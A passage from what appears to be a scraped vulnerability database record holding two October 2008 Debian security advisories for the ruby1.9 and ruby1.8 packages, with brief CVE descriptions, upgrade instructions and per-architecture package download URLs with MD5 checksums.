Size/MD5 checksum: 874098 447b15d2db96e1d6212b721b70289aa9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1680114 aa610eb8728da1c4d45b7d54a4b09058\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 372246 96a282c7252c4edef7ba6712a26dfe6f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 301600 3d528eda6e6da71c3dc5bfb92ac7a131\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1837274 08174e2e8d1128b3977dedcd49d88adf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 215368 c53207b03169c21fae94fc9a252030e0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216122 217425b4ced3f5e260f7c3e16067ccc9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 367470 ad1121d68848d0dd69c37ede15c611b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1667940 7a061e90f07190e08cb1d7dd87ceba0b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 299388 46bc91d4748b41dc94e047bab5dedd51\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216268 d71b6f0a4b75fb7e1251e69d746ca7c6\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 858514 9670a0b7dae56385110e24a689a2bba8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 235568 f81cd64d18fd7d9ad05be290eaa3a2f7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218494 e3554e99b745b152c5adceb8b792598b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218182 5d950d3fe9d4144a4a113febc734a657\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 312442 ba212e89d3ed795826291b8b83b755bf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1808838 f27c1864da2a5f200eba5f856ab9ec4d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 217620 c293eeeff7ea8f7b2662543f1787e382\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 237222 ba705f2b59847458ae944c9d88cfa29e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 777068 75b95c3a7627b97ed7cb6b65b2d430d4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 372912 2082b7a24c82d5c444d9a8e9971d153c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1844652 17411d10899861a4e0db3f2b58aa2f04\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 327718 deaec089c668e98c3826f9c3f9c16906\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217444 091b5e0da9d7f8cab82fbaac51555800\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1849530 a4eb5998265e1c0d10e47d9b3fd3376a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 371458 38d13d9c042fa13cb83e056dd6f75876\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1855840 f311eafe38b79f66c8ed62d750516e3c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 235460 c8e69420f67a74626d536b1e0634a5ee\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 884264 cb34a6a0e54e9699c2cc2527721e334a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217506 f0ee0fdfef50c2442f8ef375e1830575\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217974 62409b7918e14178a04f381f14b0b009\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 822856 9506219f2b044210b34532e0900c843d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216666 1fdc236fbbcc05ec4dcb69f287e26d4a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 372806 a217f49c1f19fa3c8fdcebc6120b89e7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1843374 5f6e40930829a86a4694231a1312e5b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216752 7e5681d7aa0e675b3fe26e83f146ac94\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1793464 023e643cbaca8191e5c213e228a59150\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 317666 4e0e420084673e075456a2cc78102cf2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 215972 20c5e03b7c7cad010b849fdcd77f9dbf\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 235354 2ce73be64e9f94b1beff935e7ffcba2f\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-10-12T09:38:22", "published": "2008-10-12T09:38:22", "id": "DEBIAN:DSA-1652-1:B2D5C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00244.html", "title": "[SECURITY] [DSA 1652-1] New ruby1.9 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-11-11T13:20:16", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1651-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.8\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.7.72-1.\n\nWe recommend that you upgrade your ruby1.8 packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz\n Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.dsc\n Size/MD5 checksum: 1079 4c7df61bd710db620b87ae0a3b98d388\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.diff.gz\n Size/MD5 checksum: 142603 f7c9366a3e04f00f5d4e7deb5d27eaf9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 1241006 d8312745f5bf656d950323c6c9761e1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 211002 1b5eefc0ee08f8224b14e9cc887c408e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 245020 e16a6c9adf8603359b5031e46185bf25\n http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 235612 69142939deabd04310455bb13f288c66\n http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 310244 e321a815c462f98b404b8c1665d1b55f\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 903552 ad6a8ddd2bf50091f4379509c7b6cef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1869012 1a2090d92784326905495c96fe508bf2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 198226 b11408bce9fbb392955416fb76d3f6b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199160 e087c534968b3ee42d5c1a8eb271ffb0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1638944 58b67c19df5d4394619792d1b8b40c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199128 5ff5a9ca775487dcd3eb6d1e1d4eb180\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 219386 d12ee43d6a3f38b98852fedc2349d3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1075242 ce403140ff57e22f5260226ff3d9325c\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 301056 98e0e061f488d2b111f032a19d5a1060\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1068652 90b93dcde06d9ddcdee05ace2c42bb9e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 217282 f7c81dbf89b107a334ecd4bb4da66ba6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198082 006299a09bf2074c481322dfbce9dfe6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 302902 6ef6a2d83f8b158b62ea62f3c4bba3fa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1586654 9d7b4530804e8089a08a95c39bdeabbe\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 748606 c07117a39289e01786fb9ee7a27a1829\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1864338 a6e21b1b7dca462d5fb45689fe092150\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 197638 f6bb914b21492cf68cb1c4558e4ac644\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198694 4757a7c9b578208d761fe2ccdce3fa41\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 200220 2d8704ff62159bb1e8c2fc635e9cb3b5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199810 4e51aa246f1602dec04095780c0f5170\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1677464 394c17e4c1e40082701773314c3310e0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1869130 04510cbc8347e4cd055f22b11a26b234\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 824102 b40a7f34f9401e1461f2211c904d3153\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1042102 f7f16a8ffb6be3a6a874b49be5904da8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 316154 82f7dcc15c9ef9c542b12830910c72d4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199118 6c2239c266c6e7653449780d6ab18f71\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 219164 2ad50197b6cf436a728c5b615a52a046\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 999668 64201f397337b7478893c08afc261e00\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 293708 2327aefddae4e2dd58e9387e36a3934c\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 219408 e3cef11245e5554bef15f5598df21a8f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197598 56ccc12092d5296e8156c1bc4f411119\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 719716 329bf36bc69b73ac908d6131e12a9933\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 198252 e5df4a73eea74976f81949cfc085c722\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1856646 f839ef877cc1d905f20868ac29d8c6d6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197916 221e994fe9132b0121ae1c1aef4d1a71\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1534674 aff183539b7a3ffb37078d263b4c0fc4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 201426 7700f382729ccb1bf36b7361eda4e1e6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 330536 de290038777d785a40b96ecde67bcb79\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 202400 425437ebd7a25ddcc24f0b00643e0e15\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 971614 157129fd20a8e99bb060eb16d04b9b1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1895636 42981c9c01f3bfe0c29d9c89c67456ea\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 218566 73418bc1a694edf6666a3bef64ab66b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1861876 81df0b92b58078d1414bca3298a801fd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 203346 861ceb05ebf6549fa2872f2f24eafdbd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1026222 1c6b059f43c36a3d2195fb071a21c0c0\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 196588 0b12b7621be85e03e3ccf9bb8bf18252\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 802442 2a8e096b0bdec5cf68ca800bab083058\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 217920 f7ad5607292040314c621508996c10e3\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197376 ceef5241e870f21a04406000cfe861f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 281460 585fe80dfa9e975314e6df5ec9f35490\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1085282 94a0aa16383ec7f2ab88d742cead73c2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1850952 26828e1d9dc0b6d24cfc9a8f5ea1bb33\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1540352 a1c65ec2cd909491de849c9907d2eabc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197514 118cfb3032dd4b79691ba0f79341bcc4\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197666 42073374de4e32b274d2a485896d0734\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1060018 eb935e3e4592e2ac723b87227258526a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 279206 21f76e4afe491f2ceaaa90215e2e6dab\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 198014 6ec3efd9b594a9cc2759d95b61f2a64a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1538558 725d0012a98297cc4ae2c2aa6d76e73f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 218098 a75856178c8addc09ae0db8dd8349b88\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 793332 fff033a8fde91eeaa458f2be3252a7bf\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1830324 a816a6d7bb2059cead4d5be647e66c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197072 cc83f3923ec214e99dfb87552813e524\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 219368 5033aca578c0a97d044b136adf2120d2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 293966 13f4c179f750c4ef69229f5f8c714908\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199990 900f11656f1bbfb7143c96eb6eca55b2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199672 b36fcd86eae4a996aceea9f51ed82b6f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1592660 53543d9b925d742e2dd0bb21842d9484\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199450 7eecb4e14d914ef9ce18297dafeb4beb\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1837328 fc2549416dba4e379f56755dc11cf3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1108684 93123428d72447a94854d3ffa7feba05\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 718932 c59ae18feb43ed2dca6300adabb1a9e4\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 305246 14e3e5cddc2398095a39f5e7db03d50d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 779454 22db8f14e5f3524693854a896d25dc73\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1620164 25eb518ccfa74c490cd894a96d464743\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 199400 7f87e9c92d21d9f0cc27168c15b09e90\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198604 f9b34b538bd4fae60bf1cfd357d78977\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198918 8e6b256da2d93404909bffaf9741cb8a\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 217956 e0603b2614b4402e24763265af2a69aa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1838970 5eb6c09970d3a051d6fe1753893c7222\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1051972 d10d44795254610d6f4becff47d5c3a7\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 961570 c65f0632dc01bc50d209487741fc41f4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1833402 426ef4a80f6c366231813b596c9bf46f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197920 006e1097f7fdc7ac9a8b89413a56f2fe\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1543240 4c4c3f00fd078b2fa6778a3245569e87\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197144 2cd715ed20b9c63c0c264adb6ed1c000\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197866 71c08be787f0a4f683b91fc539ade3c3\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 741182 9c970b4ccbba6cba80d8284218d33ef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 296052 9567adab606aecadbee3006a572f0965\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 217898 b375854870d898692db953c88bf80e53\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security 